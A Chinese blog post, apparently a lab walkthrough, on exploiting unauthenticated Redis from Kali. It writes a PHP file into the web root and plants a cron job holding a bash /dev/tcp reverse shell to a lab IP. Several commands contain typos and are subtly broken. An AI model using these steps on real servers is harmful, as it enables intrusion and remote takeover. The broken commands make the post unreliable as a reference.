redis未授权访问(kali安装redis、apache)

已于 2023-09-21 21:09:13 修改
阅读量250 收藏
点赞数
分类专栏: redis未授权访问 文章标签: redis 数据库 缓存 网络安全 安全 apache 网络攻击模型
于 2023-09-20 12:27:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/133072857
版权

一、准备阶段

(一)、安装redis

1.下载redis

wget http://download.redis.io/releases/redis-4.0.9.tar.gz

2.解压压缩包

tar zcvf redis-4.0.9.tar.gz

3.将解压的redis移动到/usr/local/redis

mv redis-4.0.9  /usr/local/redis

4.到redis文件下编译,编译需要一段时间

cd /usr/local/redis/redis-4.0.9

make

编译完成

5.安装redis

make install

6.启动redis

redis-server redis

(二)、kali启动apache

1.启动apache

/etc/init.d/apache2 start  或者   systemctl restart apache2

 2.用来检查apache是否启动  

/etc/init.d/apache2 status   或者   systemctl status apache2

二、redis未授权访问 webshell(通过redis在目录下写入自己需要的文件)

redia-cli config set /var/www/html

redis-cli condig set dbfilename test.php

redis-cli set test "<?php phpinfo(); ?>"

redis-cli save

文件被成功写入

三、crontab写定时任务

 1.kali监听端口,之后获得反弹的shell

nc -lvvp 8888

2.通过redis将需要的定时任务写入,用来反弹连接

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.182.141/8888 0>&1\n\n" | redis-cli -x set 1

redis-cli config set dir /var/spool/cron

redis-cli config set dbfilename root

redis-cli save

四、SSH免密

1.通过redis远程连接执行命令

redis-cli -h 192.168.182.141 -p 6379

2.靶机已经有了我的公钥,(公钥名字要正确

3.kali可以免密登录

余生有个小酒馆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
kali中网卡、ssh、apache的配置与开启
weixin_30929195的博客
10-02 647
Kali-linux中修改网卡文件,启动ssh和apache服务的方法 1、su root //取得root权限 2、shift+字母 //大小写字母切换 3、修改网卡配置 采用DHCP方式上网 在桌面右键->在终端中打开 -> 输入命令“vim /etc/network/interfaces” -> 键盘...
apacheredis部署
08-22
用于服务端服务器部署,主要说明关于apacheredis的部署
Redis 授权访问
Fengxin的博客
12-02 3494
0x00 前言 学习目标 1.redis特点及安装 2.redis键值操作 3.redis数据类型【String,link,set,order set,hash】 0x01 redis是什么 Redis is an open source, BSD licensed, advanced key-value store. It is often referred to as a data structure server since keys can contain strings, hashes, list
KaliKali 安装 redis-cli
边扯边淡
03-14 4246
起序:留个笔记。 一、下载 下载 redis-stable.tar.gz。 wget http://download.redis.io/redis-stable.tar.gz 二、解压 解压 redis-stable。 tar -zxf redis-stable.tar.gz 三、编译 编译 redis-stable。 # 进入到 redis-stable 目录 cd redis-stable # 编译 make 四、拷贝 编译完成之后,再将 src 目录下的 redis-cl.
Redis授权访问及利用复现(保姆级教程)
qq_34341458的博客
08-19 547
文章目录一、简介:二、漏洞影响版本三、漏洞危害四、漏洞环境搭建1. 靶机安装Redis2. kali安装Redis客户端(Redis-cli)五、漏洞复现利用方式11:写入webshell2. 写入一句话利用方式2:通过写入SSH公钥实现SSH登录利用方式3:在crontab里写定时任务,反弹shell参考: 一、简介: Redis 是一个高效的数据库,默认会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公
linux 如何重启apache
热门推荐
fzxyxf1314的博客
08-06 1万+
查看apache2的命令 httpd -V 其中HTTPD_ROOT和SERVER_CONFIG_FILE 就可以确定httpd.conf的路径了 假设当前Linux用户的apahce安装目录为/usr/local/apache2,那么在命令行终端中使用以下命令启动,停止和重启apache。 1. 启动apahce的命令: /usr/local/apache2/bin/apachectl start apache 2. 停止apache的命令: /usr/local/apache2/bin/apac..
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
1120362990#Paper#redis授权访问1
07-25
将生成的目录保存到 kitty.txt远程登陆redis命令获得当前备份路径的命令设置备份路径的命令config set dir /root/.ssh设置上传公
基于kali平台安装redis
weixin_46263525的博客
07-17 2920
基于kali平台安装redis
kali linux安装redis
weixin_56094492的博客
10-10 575
2. 其他应用程序占用端口:另一个应用程序已经占用了端口6379,这可能是与Redis相冲突。1. Redis服务器已经在运行:另一个Redis实例已经在使用端口6379监听连接。这个错误信息是Redis服务器启动时遇到的问题,提示端口6379已经被占用,导致无法创建监听 socket。如果发现其他应用程序正在使用该端口,您可以终止该应用程序或更改Redis配置文件中的端口号。但是由于第一次使用导致了redis没有正常关闭占用了端口导致无法再次启动,报出如下错误。可以看到已经可以使用了。
Kali Linux常用网络服务———apache
wwwwyyyrre的博客
05-17 2394
Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。修改成 1234端口 这时再次访问就会发现需要加上1234端口才能访问成功。使用 vim /etc/apache2/ports.conf 修改端口。4.修改apache服务端口 因为apache默认使用80端口。
RedisApacheCassandra
最新发布
禅与计算机程序设计艺术
01-28 512
1.背景介绍 1. 背景介绍 RedisApache Cassandra 都是高性能的分布式数据存储系统,它们在现代互联网应用中扮演着重要的角色。Redis 是一个高性能的键值存储系统,主要用于缓存和实时数据处理。而 Apache Cassandra 是一个分布式的宽列存储系统,主要用于大规模数据存储和处理。 在本文中,我们将深入探讨 RedisApache Cassandra ...
Redis授权访问
weixin_63960760的博客
08-29 968
redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
redis简介
Niklaus的博客
07-09 537
什么是 Redis? redis是由Apache提供的高性能的非关系型数据库 redis的特点 redis支持数据的持久化,支持将内存中的数据持久到磁盘上,这样可以避免重启或服务器宕机引起数据的丢失 redis不仅仅支持key-value这样类型的数据,还支持list ,set ,zset,hash等数据结构的存储 redis常常以集群的方式部署在节点上,采用的主从结构,支持数据的备份,即master-slave模式的数据备份 Redis 优势 redis是基于内存存储数据的,所以有高性能的读写速
kali子系统安装redis
weixin_59037232的博客
03-28 395
----------------------------------------------------分割线------------------------------------------------------------------对了,子系统又不是什么时候都开,只供方便学习,所以平时都是关着的,所以设不设防火墙都没必要,kali防火墙一般用ufw,对了,子系统本来就没安装防火墙,但你想装就apt-get install ufw就行了,装完写拦截规则痛苦至极。4.使用 dselect 升级。
Redis安装与使用
Yaoao_的博客
03-01 246
Redis安装及基本使用
Kali Linux 的常用命令
Welcome To Myon'Blog !
03-12 8906
Kali Linux 的常用命令 1、与文件目录相关的命令 2、文件查看命令 3、网络相关命令 4、进程控制命令 其他常用命令 hosts文件 脚本编写
redis php apache,Apache配置php redis扩展
weixin_40002238的博客
03-29 148
1、根据phpinfo,下载redis下载地址:注意php版本号https://windows.php.net/downloads/pecl/releases/redis/https://windows.php.net/downloads/pecl/releases/igbinary/2、给php配置redis扩展:解压缩后,将php_redis.dll、php_redis.pdb和php_igb...
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在redis.conf配置文件中设置requirepass参数,或者在Redis启动后使用config set命令设置。 3. 使用iptables等防火墙软件,限制Redis服务只能被信任的IP地址访问。 ``` 相关问题:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值